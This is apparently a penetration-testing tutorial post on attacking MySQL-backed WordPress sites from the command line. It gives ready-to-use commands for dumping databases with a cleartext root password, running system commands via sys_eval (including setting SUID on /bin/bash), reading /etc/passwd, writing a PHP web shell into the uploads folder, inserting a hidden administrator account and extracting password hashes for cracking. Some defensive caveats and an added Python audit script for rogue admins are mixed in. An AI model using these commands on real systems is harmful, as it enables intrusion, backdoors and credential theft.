Command Line MySQL for Hackers
Learning to connect to a MySQL server from the command line is extremely useful in many situations, especially penetration testing. It’s quick, easy to learn and the fastest way to get in.
General MySQL CLI
Connect to the Database
This command will log you into the MySQL server as user “user” on host address 192.168.0.26, prompting for the password.

mysql -u user -p -h 192.168.0.26

Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 4
Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>
View and Connect to a Database
To see what databases are available to the user you’ve logged in with, type the “show” command. To start working with one database, select it with the “use” command.

show databases;
use databasename;
Tricks!
# execute commands against mysql without opening the interactive monitor
mysql -u user -p --execute="show databases"
Table Viewing and Manipulation
The two most important things you should know are how to list the tables of a database and how to view their definition and contents.

show tables;
select * from tablename;
To see information about a table, such as its schema, use the “describe” command.

describe tablename;
Advanced MySQL Commands for Hackers
Creating Local Database
create database wp_hacked;
use wp_hacked;
Importing data from a SQL file is easy…
mysql -u root -p database < wp_db.sql
Ex-filtrating Database Schema
The user is “root” and the password is “plbkac”. Yes, there is no space between “-p” and the password; that is the way you do it…

mysqldump --no-data -h 192.168.0.26 -u root -pplbkac wordpress > wp_db.sql
If you just want one table with no data… try this…
mysqldump -d -h 192.168.0.26 -u root -pplbkac wordpress wp_users > wp_users.sql
Ex-filtrating Data
mysqldump --tab=/tmp -h 192.168.0.34 -u root -pplbkac wordpress wp_users

Note that --tab writes the .sql schema file locally but the .txt data file on the server host itself (it runs SELECT … INTO OUTFILE), so it needs the FILE privilege and a directory the server can write to; secure_file_priv restricts where that can be.
Running System Commands
select sys_eval("whoami");
select sys_eval("chmod u+s /bin/bash");

sys_eval() is not a built-in MySQL function; it only exists if the lib_mysqludf_sys UDF has been loaded into the server, which is why unexpected entries in mysql.func are worth auditing.
Reading Data
It is possible to read sensitive files using MySQL commands, provided the account has the FILE privilege and secure_file_priv does not block the path (setting secure_file_priv to NULL disables both load_file() and INTO OUTFILE entirely).

select load_file("/etc/shells");
select load_file("/etc/passwd");
Create Backdoor PHP Script
This will write a PHP backdoor script that executes commands against the system. From there you can easily call home with a reverse shell. The same FILE privilege and secure_file_priv restrictions apply.

SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/wp-content/uploads/shell.php";
WordPress Privilege Escalation
You can create a new user with administrative access very easily using SQL. There are 2 tables and 3 rows (one in wp_users, two in wp_usermeta) that must be inserted to accomplish this. If you don’t want to create a new user and have compromised a low-privileged user, you can use SQL to elevate your privileges by updating the wp_usermeta table. Adjusting the meta_value for the meta_keys “wp_capabilities” and “wp_user_level” will elevate access if done correctly.
This script isn’t 100% accurate. WordPress no longer uses plain MD5 hashes for passwords; it salts them through its own password-hashing code. You’ll have to reset the password afterwards or copy in a known user’s password hash.
The key thing about WordPress is understanding how data is saved. Some of the data in WordPress is saved as composite serialized strings (PHP’s serialize() format, which looks a little like JSON).
a:1:{s:6:"author";b:1;}
You can’t just change “author” to “administrator”. The “s” stands for string and the 6 means it is 6 characters long. You must update the entire serialized string, lengths included, to make this work.
a:1:{s:13:"administrator";s:1:"1";}
You will need to find the highest existing ID value and use one above it. This will not work if the ID already exists.

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha', MD5('demo'), 'Your Name', '[email protected]', 'http://www.hackaco.com/', '2019-11-21 00:00:00', '', '0', 'L33t Haxor');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8', 'wp_user_level', '10');
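Because the capability values above are PHP serialize() output, anyone auditing wp_usermeta for rogue administrators has to parse the strings rather than grep for the word “administrator”. The following is an added Python example, not code from the original post; it assumes rows have already been selected from wp_usermeta as (user_id, meta_key, meta_value) tuples and uses constructed sample rows, one of which is the exact value inserted above.

```python
# Added example (not from the original post): parses the subset of PHP serialize()
# (arrays, strings, booleans) found in wp_usermeta.meta_value and audits who holds "administrator".
def parse_php(blob: str):
    data = blob.encode("utf-8")            # s:<len> counts BYTES, not characters
    def parse_at(i):
        kind = data[i:i + 1]
        if kind == b"s":                   # s:<len>:"<bytes>";
            colon = data.index(b":", i + 2)
            length = int(data[i + 2:colon])
            start, stop = colon + 2, colon + 2 + length
            if data[stop:stop + 2] != b'";':   # s:6:"administrator" fails here
                raise ValueError(f"string length mismatch at offset {i}")
            return data[start:stop].decode("utf-8"), stop + 2
        if kind == b"b":                   # b:0; or b:1;
            return data[i + 2:i + 3] == b"1", i + 4
        if kind == b"a":                   # a:<count>:{<key><value>...}
            colon = data.index(b":", i + 2)
            count, j, result = int(data[i + 2:colon]), colon + 2, {}
            for _ in range(count):
                key, j = parse_at(j)
                result[key], j = parse_at(j)
            if data[j:j + 1] != b"}":
                raise ValueError(f"unterminated array at offset {i}")
            return result, j + 1
        raise ValueError(f"unsupported type {kind!r} at offset {i}")
    value, end = parse_at(0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value

def is_well_formed(blob: str) -> bool:
    try:
        parse_php(blob)
        return True
    except (ValueError, IndexError):
        return False

def admins_from_usermeta(rows):
    """rows: (user_id, meta_key, meta_value) tuples as selected from wp_usermeta."""
    admins = set()
    for user_id, meta_key, meta_value in rows:
        if meta_key == "wp_capabilities":
            caps = parse_php(meta_value)
            if caps.get("administrator") in (True, "1"):   # b:1; or s:1:"1";
                admins.add(int(user_id))
    return sorted(admins)
# Constructed sample rows; user 8 carries the meta_value used in the post above.
SAMPLE_ROWS = [(1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
               (2, "wp_capabilities", 'a:1:{s:6:"author";b:1;}'),
               (8, "wp_capabilities", 'a:1:{s:13:"administrator";s:1:"1";}'),
               (8, "wp_user_level", "10")]
```

Running admins_from_usermeta over the real table and comparing the result with the expected administrator list is a cheap integrity check; is_well_formed flags the hand-edited values whose length prefixes no longer match.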
Extracting WordPress Hashes for John
By concatenating the user login and password hash we can extract the data in a form John the Ripper reads directly.

select concat_ws(':', user_login, user_pass) from wp_users;

+--------------------------------------------+
| concat_ws(':', user_login, user_pass)      |
+--------------------------------------------+
| admin:$P$BJQSBmO3Hj5SIDKzAkVX8wQYN6EJqx/   |
| barney:$P$Brk7T36qysdSksZmPyfdQCqpoaIqvN1  |
| gillian:$P$BJxWr8/nTjEC6IttflERKg2v.THUNA1 |
| peter:$P$B3eHaQ66YFM6EwWB6y/Y3i/3ud1Kqp/   |
| stephen:$P$BcQaPOdWmcAzREQh9rR2bmGBBz6qUO1 |
+--------------------------------------------+